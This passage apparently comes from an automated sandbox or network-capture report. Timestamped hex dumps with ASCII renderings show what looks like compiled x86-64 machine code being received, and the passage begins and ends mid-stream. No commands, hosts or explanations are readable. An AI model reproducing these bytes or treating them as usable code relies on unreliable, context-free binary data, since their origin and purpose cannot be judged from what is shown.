                                                                                                                                                                                                                    Data Ascii: H H$HHLH$LAH$'H$gHBH9LD$ HL$ HHT$(dIHt$0H|$8IcE1LH[cI$H9HHL"g`E1I(\(L$Ll$0AIHGzGI)\(\@HHHE1H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC39INData Raw: ff 48 8d 0d 54 8a 60 00 e8 0f 69 5f 00 48 8b 8c 24 68 03 00 00 48 89 b4 24 60 03 00 00 49 89 c4 48 39 f9 74 05 e8 72 18 5f 00 4c 89 e1 e8 2a 48 42 00 49 8b 0c 24 49 89 c5 48 39 cf 74 05 e8 59 18 5f 00 4c 89 e9 e8 11 48 42 00 48 8b 8c 24 48 01 00 00 48 89 b4 24 40 01 00 00 49 89 c4 48 39 f9 75 c2 eb c5 49 8b 0c 24 49 89 c5 48 39 4c 24 48 75 cb eb ce 49 8b 0c 24 49 89 c5 48 39 cb 75 bd eb c0 eb f0 eb ee eb ec 49 89 c5 eb 49 eb f9 b9 10 00 00 00 e8 32 19 5f 00 48 8d 15 2a 8a 60 00 48 89 c1 49 89 c6 e8 e0 a7 59 00 48 8d 05 b9 76 75 00 4c 8d 05 f2 e1 ff ff 4c 89 f1 49 89 06 48 8d 15 e5 27 75 00 e8 80 1f 5f 00 4c 89 f1 49 89 c5 e8 15 1c 5f 00 49 8b 0c 24 48 39 ce 0f 85 5a ff ff ff e9 5a ff ff ff 0f 1f 00 41 55 41 54 57 56 53 48 83 ec 70 4d 8b 18 4d 8b 40 08 89
                                                                                                                                                                                                                    Data Ascii: HT`i_H$hH$`IH9tr_L*HBI$IH9tY_LHBH$HH$@IH9uI$IH9L$HuI$IH9uII2_H*`HIYHvuLLIH'u_LI_I$H9ZZAUATWVSHpMM@
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC40INData Raw: 24 78 48 8b 9c 24 80 00 00 00 4c 89 64 24 50 48 89 e8 48 01 d8 74 09 48 85 ed 0f 84 d9 00 00 00 48 89 5c 24 40 48 83 fb 0f 0f 87 8b 00 00 00 48 83 fb 01 75 75 0f b6 45 00 4c 8d 74 24 40 88 44 24 60 4c 89 e0 48 89 5c 24 58 4c 89 fa 4c 89 f1 c6 04 18 00 e8 41 a3 59 00 4c 89 f2 4c 89 e9 e8 f6 a4 59 00 4c 89 f1 e8 8e a4 59 00 48 8b 4c 24 50 4c 39 e1 74 05 e8 bf 12 5f 00 48 8b 4c 24 78 48 89 7c 24 70 48 39 f1 74 06 e8 ab 12 5f 00 90 48 81 c4 98 02 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 66 0f 1f 44 00 00 48 85 db 75 56 4c 89 e0 4c 8d 74 24 40 eb 8c 90 4c 8d 74 24 40 45 31 c0 4c 89 f9 4c 89 f2 e8 4d c7 5b 00 48 89 44 24 50 48 89 c1 48 8b 44 24 40 48 89 44 24 60 49 89 d8 48 89 ea e8 18 34 43 00 48 8b 5c 24 40 48 8b 44 24 50 e9 4c ff ff ff 48 8d 0d fa 83 60
                                                                                                                                                                                                                    Data Ascii: $xH$Ld$PHHtHH\$@HHuuELt$@D$`LH\$XLLAYLLYLYHL$PL9t_HL$xH|$pH9t_H[^_]A\A]A^A_fDHuVLLt$@Lt$@E1LLM[HD$PHHD$@HD$`IH4CH\$@HD$PLH`
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC41INData Raw: 8b 50 08 49 8b 00 48 8d b4 24 80 00 00 00 4c 8d 6c 24 40 48 89 54 24 38 48 89 cb 66 48 0f 6e ce 48 8d 4c 24 60 4c 8d 44 24 30 4c 89 ea 66 0f 6c c1 4c 89 54 24 40 0f 11 44 24 60 f3 0f 6f 05 e5 8d 60 00 4c 89 5c 24 48 48 89 44 24 30 0f 11 44 24 70 e8 11 3d 44 00 48 89 d9 ff 15 04 bc af 00 41 89 c4 89 c1 ff 15 51 bc af 00 48 8b 4c 24 68 48 8b 6c 24 70 85 c0 75 47 49 89 d9 49 89 e8 ba 01 00 00 00 e8 97 32 43 00 48 39 e8 0f 82 52 01 00 00 48 8b 4c 24 68 48 89 7c 24 60 48 39 f1 74 06 e8 22 11 5f 00 90 48 81 c4 90 06 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e c3 0f 1f 80 00 00 00 00 48 89 4c 24 40 4c 89 ea 48 8d 8c 24 80 02 00 00 48 89 6c 24 48 e8 5e df ff ff 48 8b 84 24 90 02 00 00 c7 44 24 5c 00 00 00 00 44 89 e1 4c 8b ac 24 88 02 00 00 48 8d 58 ff ff 15 a5 bb af 00
                                                                                                                                                                                                                    Data Ascii: PIH$Ll$@HT$8HfHnHL$`LD$0LflLT$@D$`o`L\$HHD$0D$p=DHAQHL$hHl$puGII2CH9RHL$hH|$`H9t"_H[^_]A\A]A^HL$@LH$Hl$H^H$D$\DL$HX
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC57INData Raw: 28 01 00 00 41 5c 41 5d c3 0f 1f 80 00 00 00 00 4c 89 ea 4c 89 e1 e8 5d 4a 04 00 4c 89 e0 48 81 c4 28 01 00 00 41 5c 41 5d c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 41 57 41 56 41 55 41 54 56 53 48 81 ec 58 01 00 00 48 8d 15 8c 5a 60 00 4c 8d 64 24 50 4c 8d 7c 24 60 4c 89 e1 e8 16 4a 04 00 48 8d 15 81 5a 60 00 4c 89 f9 e8 07 4a 04 00 4c 8d 6c 24 20 4c 8d 35 1b 54 7d 00 4d 89 e0 4c 89 f2 4c 89 e9 e8 5d cb 5c 00 48 8b 4c 24 60 48 85 c9 74 05 e8 1e d1 5e 00 48 8b 4c 24 50 48 85 c9 74 05 e8 0f d1 5e 00 48 8d 15 41 5a 60 00 4c 89 e1 e8 c0 49 04 00 48 8d 15 3d 5a 60 00 4c 89 f9 e8 b1 49 04 00 4d 89 e0 4c 89 f2 4c 89 e9 e8 13 cb 5c 00 48 8b 4c 24 60 48 85 c9 74 05 e8 d4 d0 5e 00 48 8b 4c 24 50 48 85 c9 74 05 e8 c5 d0 5e 00 48 c7 44 24 50 00 00 00 00 ba 00 01
                                                                                                                                                                                                                    Data Ascii: (A\A]LL]JLH(A\A]ff.AWAVAUATVSHXHZ`Ld$PL|$`LJHZ`LJLl$ L5T}MLL]\HL$`Ht^HL$PHt^HAZ`LIH=Z`LIMLL\HL$`Ht^HL$PHt^HD$P
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC73INData Raw: 00 00 4d 89 e6 4c 89 e0 89 e9 4c 89 64 24 28 48 bf ff ff ff ff ff ff 00 00 49 c1 ee 30 44 89 f2 48 21 f8 66 81 e2 00 10 49 0f 45 c3 66 89 54 24 3a 49 89 c7 4c 89 e0 48 c1 e0 10 4d 89 fe 48 c1 f8 38 29 c1 89 4c 24 3c 48 8b 8c 24 a8 00 00 00 e8 eb b3 42 00 48 8b 5e a8 44 8b 56 a0 c7 44 24 44 00 00 00 00 48 8b 4c 24 28 89 44 24 40 48 21 fb 49 c1 e2 05 4e 8d 2c 13 48 89 4c 24 48 4c 39 eb 74 5c 66 83 7c 24 3a 00 41 89 c4 44 0f 45 64 24 3c 45 89 e7 eb 0f 90 44 39 23 74 6b 48 83 c3 20 49 39 dd 74 39 f6 43 0f 10 74 ec 0f be 53 0d 89 e8 29 d0 48 89 da 41 39 c4 75 e1 4c 39 f2 74 17 4d 89 f8 4c 89 f1 e8 bc b2 42 00 85 c0 75 cd 0f 1f 84 00 00 00 00 00 66 83 7b 1e 04 74 32 48 83 ee 60 48 3b 74 24 30 0f 85 5a ff ff ff 48 8d 05 f3 13 7d 00 48 83 c4 58 5b 5e 5f 5d 41 5c
                                                                                                                                                                                                                    Data Ascii: MLLd$(HI0DH!fIEfT$:ILHMH8)L$<H$BH^DVD$DHL$(D$@H!IN,HL$HL9t\f|$:ADEd$<ED9#tkH I9t9CtS)HA9uL9tMLBuf{t2H`H;t$0ZH}HX[^_]A\
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC89INData Raw: 74 16 4c 89 e1 48 83 c4 28 41 5c 41 5d e9 b6 51 5e 00 66 0f 1f 44 00 00 4c 89 e9 48 8d 15 56 4e 5e 00 e8 51 d7 34 00 4c 89 e1 48 83 c4 28 41 5c 41 5d e9 91 51 5e 00 90 41 54 48 83 ec 20 48 8d 05 b3 b4 74 00 4c 8b 61 08 48 89 01 4d 85 e4 74 0c 4c 89 e1 e8 1f da 34 00 85 c0 74 0b 48 83 c4 20 41 5c c3 0f 1f 40 00 48 8d 15 09 4e 5e 00 4c 89 e1 e8 01 d7 34 00 90 48 83 c4 20 41 5c c3 90 0f 1f 84 00 00 00 00 00 41 55 41 54 53 48 83 ec 30 48 83 79 08 00 8b 84 24 80 00 00 00 48 89 cb 4d 89 cc 74 0b 48 8b 15 5c 29 74 00 38 02 74 10 48 83 c4 30 5b 41 5c 41 5d c3 66 0f 1f 44 00 00 44 8b 44 24 78 4c 8d 6c 24 20 4c 89 ca 4c 89 e9 e8 c3 e7 33 00 48 8b 4b 10 48 85 c9 74 42 e8 35 73 35 00 83 f8 01 75 38 b9 01 00 00 00 e8 06 d6 34 00 83 f8 0e 74 05 83 f8 07 75 24 48 8b 4b
                                                                                                                                                                                                                    Data Ascii: tLH(A\A]Q^fDLHVN^Q4LH(A\A]Q^ATH HtLaHMtL4tH A\@HN^L4H A\AUATSH0Hy$HMtH\)t8tH0[A\A]fDDD$xLl$ LL3HKHtB5s5u84tu$HK
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC105INData Raw: c7 44 24 70 00 00 00 00 8b 44 24 48 f3 0f 6f 4c 24 70 41 c7 47 04 00 00 00 00 41 89 07 49 89 77 08 41 0f 11 4f 10 41 83 04 24 01 e9 68 fc ff ff 49 89 c2 49 29 ea 49 01 d2 4d 39 ca 0f 87 34 fe ff ff 4d 89 57 08 4c 8b 46 08 8b 06 e9 4d fe ff ff 41 b9 00 01 00 00 bb 10 00 00 00 48 8b 44 24 50 4c 89 cd 4c 8b 78 10 4d 8b 37 4d 8b 6e 08 4b 8d 04 29 49 3b 06 0f 87 1e 01 00 00 49 83 c5 18 49 89 46 08 4d 01 f5 4c 8b 46 08 8b 06 e9 0c fe ff ff 49 89 e8 4c 89 ea e8 f3 32 42 00 4c 8b 46 08 48 89 c1 8b 06 49 89 cd e9 f0 fd ff ff 48 89 d0 48 29 d8 48 01 e8 4c 39 c8 0f 87 e1 fe ff ff 49 89 47 08 48 8b 4c 24 58 e9 ef fe ff ff bd 00 02 00 00 bf 10 00 00 00 48 8b 44 24 50 4c 8b 78 10 4d 8b 37 49 8b 46 08 48 8d 54 05 00 49 3b 16 0f 87 88 01 00 00 49 89 56 08 49 8d 4c 06 18
                                                                                                                                                                                                                    Data Ascii: D$pD$HoL$pAGAIwAOA$hII)IM94MWLFMAHD$PLLxM7MnK)I;IIFMLFIL2BLFHIHH)HL9IGHL$XHD$PLxM7IFHTI;IVIL
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC121INData Raw: ff ff 48 8b 54 24 68 4d 89 f8 e8 81 f3 41 00 48 89 c1 e9 73 fd ff ff 49 8b 29 48 39 ea 48 0f 43 ea 49 83 79 08 00 0f 84 bb 00 00 00 48 89 e9 48 83 c1 18 0f 84 02 ff ff ff 4c 89 5c 24 50 48 89 54 24 48 4c 89 54 24 40 4c 89 44 24 38 e8 26 f3 41 00 4c 8b 44 24 38 4c 8b 54 24 40 48 85 c0 48 8b 54 24 48 4c 8b 5c 24 50 0f 84 cc fe ff ff 4c 89 58 10 49 89 c3 48 89 28 48 c7 40 08 00 00 00 00 49 89 02 e9 e6 fb ff ff 48 8b 2a 48 39 e9 48 0f 43 e9 48 83 7a 08 00 0f 84 92 00 00 00 48 89 e9 4c 89 44 24 40 4c 89 4c 24 38 48 83 c1 18 0f 84 6e fe ff ff e8 be f2 41 00 48 85 c0 0f 84 60 fe ff ff 4c 8b 44 24 40 4c 8b 4c 24 38 48 89 28 48 c7 40 08 00 00 00 00 4c 89 40 10 49 89 c0 49 89 01 e9 00 ff ff ff b9 01 00 00 00 4c 89 5c 24 58 48 89 54 24 50 4c 89 54 24 48 4c 89 44 24
                                                                                                                                                                                                                    Data Ascii: HT$hMAHsI)H9HCIyHHL\$PHT$HLT$@LD$8&ALD$8LT$@HHT$HL\$PLXIH(H@IH*H9HCHzHLD$@LL$8HnAH`LD$@LL$8H(H@L@IIL\$XHT$PLT$HLD$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC137INData Raw: f0 41 83 6c 24 08 01 74 4f 48 8b 53 50 48 39 53 70 0f 85 5e ff ff ff 4c 8b a3 98 00 00 00 66 0f ef c0 0f 11 83 90 00 00 00 4d 85 e4 74 0d f0 41 83 6c 24 08 01 0f 84 9d 00 00 00 48 83 c4 20 5b 5e 5f 41 5c 41 5d c3 90 48 8b 53 50 0f 1f 40 00 45 31 e4 e9 6c ff ff ff 49 8b 04 24 4c 89 e1 ff 50 10 f0 41 83 6c 24 0c 01 75 9e 49 8b 04 24 4c 89 e1 ff 50 18 eb 92 90 48 85 c9 74 07 f0 83 69 0c 01 74 3c 48 8b 4b 58 e8 3b 91 5d 00 48 8b 43 68 48 8d 50 08 48 89 53 68 48 8b 50 08 48 8d 82 00 02 00 00 66 48 0f 6e c2 66 48 0f 6e c8 66 0f 6c c1 0f 11 43 58 e9 38 ff ff ff 0f 1f 44 00 00 48 8b 01 ff 50 18 eb bc e8 7b 40 33 00 48 89 c6 e9 8e fe ff ff 0f 1f 00 49 8b 04 24 4c 89 e1 ff 50 10 f0 41 83 6c 24 0c 01 0f 85 4c ff ff ff 49 8b 04 24 4c 89 e1 48 8b 40 18 48 83 c4 20 5b
                                                                                                                                                                                                                    Data Ascii: Al$tOHSPH9Sp^LfMtAl$H [^_A\A]HSP@E1lI$LPAl$uI$LPHtit<HKX;]HChHPHShHPHfHnfHnflCX8DHP{@3HI$LPAl$LI$LH@H [
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC153INData Raw: 4e 00 00 48 89 93 20 05 00 00 b9 80 00 00 00 e8 04 52 5d 00 48 8b bb 38 05 00 00 b9 40 01 00 00 49 89 c5 48 89 38 e8 ed 51 5d 00 48 89 83 40 05 00 00 49 89 c4 48 89 38 e8 bb 10 33 00 4c 89 e2 48 89 c1 e8 b0 86 34 00 48 8b 8b 40 05 00 00 ba 01 00 00 00 e8 ef a2 34 00 48 8b 93 40 05 00 00 49 89 f0 4c 89 e9 4c 8d 0d fb 00 00 00 48 83 c4 20 5b 5e 5f 41 5c 41 5d e9 0b 09 33 00 90 66 2e 0f 1f 84 00 00 00 00 00 41 54 48 83 ec 20 49 89 cc 48 8b 89 b8 04 00 00 48 85 c9 0f 85 97 00 00 00 49 8b 04 24 48 8d 0d 7c e5 ff ff 48 8b 50 28 48 39 ca 0f 85 8f 00 00 00 41 f6 84 24 d8 02 00 00 04 74 54 49 83 bc 24 18 05 00 00 00 74 54 e8 34 e1 58 00 48 ba db 34 b6 d7 82 de 1b 43 48 89 c1 48 f7 ea 48 c1 f9 3f 48 c1 fa 12 48 29 ca 49 8b 8c 24 18 05 00 00 48 81 c2 20 4e 00 00 49
                                                                                                                                                                                                                    Data Ascii: NH R]H8@IH8Q]H@IH83LH4H@4H@ILLH [^_A\A]3f.ATH IHHI$H|HP(H9A$tTI$tT4XH4CHHH?HH)I$H NI
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC169INData Raw: 78 10 48 89 d7 48 c7 40 08 00 00 00 00 48 8b 44 24 38 48 89 10 48 8b 44 24 40 ba 18 00 00 00 e9 23 f8 ff ff 49 8b 07 49 39 c0 49 0f 43 c0 49 83 7f 08 00 48 89 44 24 58 0f 84 7b 04 00 00 4c 8b 64 24 58 31 c9 4d 89 e0 49 83 c0 18 0f 84 54 fa ff ff 4c 89 c1 e8 1e 33 41 00 48 89 c2 48 89 c1 48 85 c0 0f 84 3d fa ff ff 4c 89 20 b9 18 00 00 00 48 c7 40 08 00 00 00 00 48 8b 44 24 40 48 89 54 24 40 48 89 42 10 48 8b 44 24 48 48 89 10 48 8b 44 24 50 e9 f5 f9 ff ff 49 8b 07 49 39 c0 49 0f 43 c0 49 83 7f 08 00 48 89 44 24 48 0f 84 be 03 00 00 4c 8b 64 24 48 31 c9 4d 89 e0 49 83 c0 18 0f 84 b9 f8 ff ff 4c 89 c1 e8 a9 32 41 00 48 89 c2 48 89 c1 48 85 c0 0f 84 a2 f8 ff ff 4c 89 20 b9 18 00 00 00 48 89 78 10 48 89 d7 48 c7 40 08 00 00 00 00 48 8b 44 24 38 48 89 10 48 8b
                                                                                                                                                                                                                    Data Ascii: xHH@HD$8HHD$@#II9ICIHD$X{Ld$X1MITL3AHHH=L H@HD$@HT$@HBHD$HHHD$PII9ICIHD$HLd$H1MIL2AHHHL HxHH@HD$8HH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC185INData Raw: 89 c1 48 85 c0 0f 84 9d ec ff ff 4c 8b 54 24 20 4c 8b 44 24 28 48 c7 40 08 00 00 00 00 4c 8b 4c 24 38 4c 89 10 4c 8b 54 24 30 4c 89 40 10 49 89 c0 49 89 01 b8 18 00 00 00 e9 1b fd ff ff 48 8b 2e 49 39 ed 49 0f 43 ed 48 83 7e 08 00 0f 84 0a 05 00 00 49 89 e9 4c 89 44 24 28 31 c9 49 83 c1 18 0f 84 9f f1 ff ff 4c 89 c9 48 89 54 24 20 e8 04 f3 40 00 48 8b 54 24 20 48 85 c0 48 89 c1 0f 84 81 f1 ff ff 4c 8b 44 24 28 4c 89 78 10 4d 89 e9 49 89 c7 48 89 28 48 c7 40 08 00 00 00 00 49 89 00 b8 18 00 00 00 e9 79 fc ff ff 48 8b 06 48 39 c2 48 0f 43 c2 48 83 7e 08 00 48 89 44 24 20 0f 84 c2 04 00 00 4c 8b 54 24 20 4c 89 44 24 38 31 c9 4c 89 4c 24 30 48 89 54 24 28 49 83 c2 18 0f 84 29 ee ff ff 4c 89 d1 e8 8a f2 40 00 48 89 c1 48 85 c0 0f 84 15 ee ff ff 4c 8b 54 24 20
                                                                                                                                                                                                                    Data Ascii: HLT$ LD$(H@LL$8LLT$0L@IIH.I9ICH~ILD$(1ILHT$ @HT$ HHLD$(LxMIH(H@IyHH9HCH~HD$ LT$ LD$81LL$0HT$(I)L@HHLT$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC201INData Raw: 24 30 49 83 c2 18 0f 84 a7 db ff ff 4c 89 d1 e8 64 b3 40 00 48 89 c1 48 85 c0 0f 84 93 db ff ff 4c 8b 44 24 30 4c 89 78 10 b9 18 00 00 00 49 89 c7 48 c7 40 08 00 00 00 00 4c 89 00 4c 8b 44 24 38 49 89 06 e9 fb f8 ff ff 48 8b 4c 24 28 48 8b 01 49 39 c1 49 0f 43 c1 48 83 79 08 00 49 89 c3 0f 84 66 09 00 00 4d 89 da 48 89 54 24 50 31 c9 4c 89 44 24 48 4c 89 4c 24 40 4c 89 5c 24 38 49 83 c2 18 0f 84 f4 d6 ff ff 4c 89 d1 e8 e7 b2 40 00 49 89 c2 48 89 c1 48 85 c0 0f 84 dd d6 ff ff 48 8b 54 24 50 4c 8b 5c 24 38 48 c7 40 08 00 00 00 00 b9 18 00 00 00 4c 8b 44 24 48 48 89 50 10 4c 89 d2 4c 89 18 49 89 00 48 8b 44 24 40 e9 31 f9 ff ff 48 89 c1 48 8b 00 49 39 c7 49 0f 43 c7 48 83 79 08 00 49 89 c1 0f 84 f6 07 00 00 4d 89 ca 48 89 54 24 40 31 c9 4c 89 44 24 38 4c 89
                                                                                                                                                                                                                    Data Ascii: $0ILd@HHLD$0LxIH@LLD$8IHL$(HI9ICHyIfMHT$P1LD$HLL$@L\$8IL@IHHHT$PL\$8H@LD$HHPLLIHD$@1HHI9ICHyIMHT$@1LD$8L
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC217INData Raw: 02 00 00 45 31 c0 48 8b 44 24 20 48 8b 40 10 4c 8b 38 48 89 44 24 30 49 8b 47 08 4d 8b 17 48 8d 48 18 4c 89 54 24 28 49 89 ca 4d 29 c2 4d 01 fa 4d 39 d3 0f 84 8f 0e 00 00 4c 01 c8 48 3b 44 24 28 0f 87 3d 12 00 00 49 89 47 08 4c 01 f9 4d 85 c0 0f 85 11 10 00 00 48 b8 00 00 00 00 00 00 ff ff 45 89 74 24 04 48 21 d0 48 09 c8 49 89 44 24 08 0f 1f 80 00 00 00 00 49 be ff ff ff ff ff ff 00 00 48 c1 e6 05 4c 21 f0 48 01 c6 89 2e c7 46 04 00 00 00 00 48 89 7e 08 f3 0f 6f 5c 24 70 0f 11 5e 10 41 83 04 24 01 83 7b 10 01 0f 84 16 0a 00 00 48 8d 93 c0 00 00 00 4c 89 e9 e8 a7 cb 01 00 48 8b 3d e0 b5 5c 00 48 89 f9 e8 70 73 40 00 41 8b 34 24 45 8b 44 24 04 48 89 c5 48 b8 00 00 00 00 00 00 05 04 48 09 c7 49 8b 44 24 08 44 39 c6 0f 82 91 00 00 00 45 85 c0 0f 85 48 05 00
                                                                                                                                                                                                                    Data Ascii: E1HD$ H@L8HD$0IGMHHLT$(IM)MM9LH;D$(=IGLMHEt$H!HID$IHL!H.FH~o\$p^A${HLH=\Hps@A4$ED$HHHID$D9EH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC233INData Raw: 48 89 c5 48 b8 00 00 00 00 00 00 05 04 48 09 c7 44 89 e8 c1 f8 1f 66 25 c0 fe 66 05 f6 01 66 89 44 24 6e 48 8b 46 08 44 39 c3 0f 82 90 00 00 00 45 85 c0 0f 85 0f 01 00 00 49 89 c7 49 21 c6 0f 84 33 04 00 00 4c 89 f2 41 bc 10 00 00 00 41 be 00 02 00 00 45 31 c0 48 8b 44 24 20 48 8b 40 10 4c 8b 08 48 89 44 24 28 49 8b 41 08 4d 8b 19 48 8d 48 18 49 89 ca 4d 29 c2 4d 01 ca 4c 39 d2 0f 84 e3 02 00 00 4c 01 f0 4c 39 d8 0f 87 48 06 00 00 49 89 41 08 4c 01 c9 4d 85 c0 0f 85 ee 04 00 00 48 b8 00 00 00 00 00 00 ff ff 44 89 66 04 4c 21 f8 48 09 c8 48 89 46 08 0f 1f 80 00 00 00 00 48 ba ff ff ff ff ff ff 00 00 48 c1 e3 05 48 21 d0 48 01 c3 89 2b c7 43 04 00 00 00 00 48 89 7b 08 4c 89 6c 24 60 f3 0f 6f 6c 24 60 0f 11 6b 10 83 06 01 e9 b8 f9 ff ff 45 8d 60 01 41 d1 ec
                                                                                                                                                                                                                    Data Ascii: HHHDf%ffD$nHFD9EII!3LAAE1HD$ H@LHD$(IAMHHIM)ML9LL9HIALMHDfL!HHFHHH!H+CH{Ll$`ol$`kE`A
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC249INData Raw: 0f 1f 84 00 00 00 00 00 49 39 f8 74 08 84 c0 0f 84 b8 02 00 00 b9 01 00 00 00 49 89 f9 48 89 da e8 d3 55 5b 00 48 83 45 28 01 b9 28 00 00 00 e8 e4 d1 5b 00 4c 8b 6b 28 48 8b 5d 70 49 89 c6 4c 89 68 20 48 85 db 75 0b e9 d8 00 00 00 0f 1f 00 48 89 c3 48 8b 53 20 48 8b 43 18 49 39 d5 48 0f 42 43 10 0f 92 c1 48 85 c0 75 e5 84 c9 0f 85 b5 00 00 00 49 39 d5 0f 86 cb 00 00 00 48 85 db 0f 84 c2 00 00 00 b9 01 00 00 00 4c 39 e3 0f 85 dd 01 00 00 4d 89 e1 49 89 d8 4c 89 f2 e8 57 55 5b 00 48 83 85 88 00 00 00 01 4c 8b 4d 10 49 89 fd 4d 85 c9 0f 84 2f 02 00 00 4c 89 cb eb 13 66 2e 0f 1f 84 00 00 00 00 00 48 8b 5b 18 48 85 db 74 17 48 39 73 20 72 f1 48 8b 43 10 76 7b 49 89 dd 48 89 c3 48 85 db 75 e9 49 39 fd 0f 94 c0 4c 39 6d 18 0f 85 13 fe ff ff 84 c0 0f 84 0b fe ff
                                                                                                                                                                                                                    Data Ascii: I9tIHU[HE(([Lk(H]pILh HuHHS HCI9HBCHuI9HL9MILWU[HLMIM/Lf.H[HtH9s rHCv{IHHuI9L9m
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC265INData Raw: 6f 56 60 8d 14 00 8b 46 74 44 0f 11 03 66 44 0f 6f c7 0f c6 e9 44 44 0f c6 c6 4e 0f c6 c8 4e 66 44 0f fa c0 0f c6 c4 4e 66 0f fe c6 66 0f fe cf 01 c0 8b 8b 98 00 00 00 0f 11 43 40 f3 0f 6f 43 78 66 0f 72 f3 01 66 44 0f 6f ce f3 0f 6f 7b 78 44 0f 11 43 10 66 0f 72 f2 01 01 d1 66 0f fe c3 44 0f c6 cc ee f3 0f 6f a3 88 00 00 00 89 4b 70 8b 8b 9c 00 00 00 66 45 0f 6f c1 66 0f fa df 0f 11 43 50 2b 93 98 00 00 00 66 44 0f fa c5 f3 0f 6f 83 88 00 00 00 66 41 0f fe e9 01 c1 0f 10 74 24 20 0f 11 4b 30 66 0f fe c2 2b 83 9c 00 00 00 66 0f fa d4 89 4b 74 44 0f c6 c5 e4 89 93 98 00 00 00 0f 10 7c 24 30 89 83 9c 00 00 00 44 0f 11 43 20 0f 11 43 60 0f 11 5b 78 0f 11 93 88 00 00 00 44 0f 10 44 24 40 44 0f 10 4c 24 50 48 83 c4 68 5b 5e 5f 41 5c c3 90 41 54 55 57 56 53 48
                                                                                                                                                                                                                    Data Ascii: oV`FtDfDoDDNNfDNffC@oCxfrfDoo{xDCfrfDoKpfEofCP+fDofAt$ K0f+fKtD|$0DC C`[xDD$@DL$PHh[^_A\ATUWVSH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC281INData Raw: 49 c1 ef 0d 48 09 ea 4c 09 f9 48 c1 e2 08 48 c1 e1 08 4c 09 d2 4c 09 f1 48 c1 e2 08 48 c1 e1 08 48 09 fa 4c 09 c9 48 c1 e2 08 48 c1 e1 08 4c 09 c2 4c 09 e9 48 c1 e2 08 48 c1 e1 08 48 09 f2 48 09 d9 48 c1 e2 08 48 89 0c 24 4c 09 da 48 89 54 24 08 f3 0f 6f 0c 24 0f 11 48 10 48 83 c4 68 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 66 66 2e 0f 1f 84 00 00 00 00 00 90 41 57 41 56 41 55 41 54 55 57 56 53 48 81 ec d8 09 00 00 0f 11 b4 24 60 09 00 00 0f 11 bc 24 70 09 00 00 44 0f 11 84 24 80 09 00 00 44 0f 11 8c 24 90 09 00 00 44 0f 11 94 24 a0 09 00 00 44 0f 11 9c 24 b0 09 00 00 44 0f 11 a4 24 c0 09 00 00 45 31 d2 48 8d 84 24 a0 01 00 00 48 89 cb 4c 89 c6 49 89 d1 48 89 84 24 80 00 00 00 49 89 d0 48 8d 8c 24 a1 01 00 00 4c 8d b4 24 df 01 00 00 90 41 0f b6 00 48 83 c1
                                                                                                                                                                                                                    Data Ascii: IHLHHLLHHHLHHLLHHHHHH$LHT$o$HHh[^_]A\A]A^A_ff.AWAVAUATUWVSH$`$pD$D$D$D$D$E1H$HLIH$IH$L$AH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC297INData Raw: 4c 01 cd 4c 8d 88 00 00 10 00 41 81 e3 ff ff 1f 00 4d 89 cf 49 81 e1 00 00 e0 ff 49 c1 e5 10 4c 29 c8 49 c1 ff 15 4d 01 c7 49 89 c0 49 8d 84 24 00 00 10 00 49 89 c1 48 25 00 00 e0 ff 49 29 c4 0f b6 41 13 49 c1 f9 15 49 01 d9 49 8d 9a 00 00 10 00 48 c1 e0 08 4c 09 e8 44 0f b6 69 12 4c 09 e8 49 89 dd 48 81 e3 00 00 e0 ff 49 c1 fd 15 49 29 da 48 c1 e8 03 48 8d 9e 00 00 10 00 4c 01 e8 49 89 dd 48 81 e3 00 00 e0 ff 48 29 de 49 c1 fd 15 49 8d 9b 00 00 10 00 49 01 fd 48 89 df 48 c1 ff 15 48 81 e3 00 00 e0 ff 4c 01 f7 4c 8d b5 00 00 10 00 49 29 db 4c 89 f3 49 81 e6 00 00 e0 ff 4c 29 f5 48 c1 fb 15 4d 8d b7 00 00 10 00 4c 01 c3 4d 89 f0 49 81 e6 00 00 e0 ff 49 c1 f8 15 4d 29 f7 4d 01 e0 4d 8d a1 00 00 10 00 4d 89 e6 49 81 e4 00 00 e0 ff 4d 29 e1 49 c1 fe 15 4c 8d
                                                                                                                                                                                                                    Data Ascii: LLAMIIL)IMII$IH%I)AIIIHLDiLIHII)HHLIHH)IIIHHHLLI)LIL)HMLMIIM)MMMIM)IL
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC313INData Raw: 09 00 4c 01 e8 4c 69 ed d1 15 02 00 48 69 ed 83 90 f5 ff 4d 01 f5 4c 69 f1 13 2c 0a 00 4c 03 74 24 70 48 01 f5 48 69 f1 18 2d 07 00 48 01 de 48 69 d9 67 fb 09 00 49 01 f7 49 69 f2 53 c6 f0 ff 4c 01 e3 4c 69 e1 53 c6 f0 ff 48 01 de 49 69 da d1 15 02 00 4d 01 cc 4c 69 c9 d1 15 02 00 4c 01 e3 49 01 c1 48 69 c1 83 90 f5 ff 49 69 ca 18 2d 07 00 4c 01 e8 4d 69 ea 13 2c 0a 00 4c 03 6c 24 38 4d 69 d2 83 90 f5 ff 4c 01 f1 4c 69 f2 13 2c 0a 00 4c 03 74 24 48 4f 8d 24 0a 4c 69 ca 18 2d 07 00 4c 69 d2 d1 15 02 00 4d 01 e9 4c 69 ea 67 fb 09 00 49 01 f2 49 69 f0 13 2c 0a 00 48 03 74 24 40 49 01 cd 48 69 ca 53 c6 f0 ff 48 69 d2 83 90 f5 ff 4c 01 f9 48 01 da 49 69 d8 18 2d 07 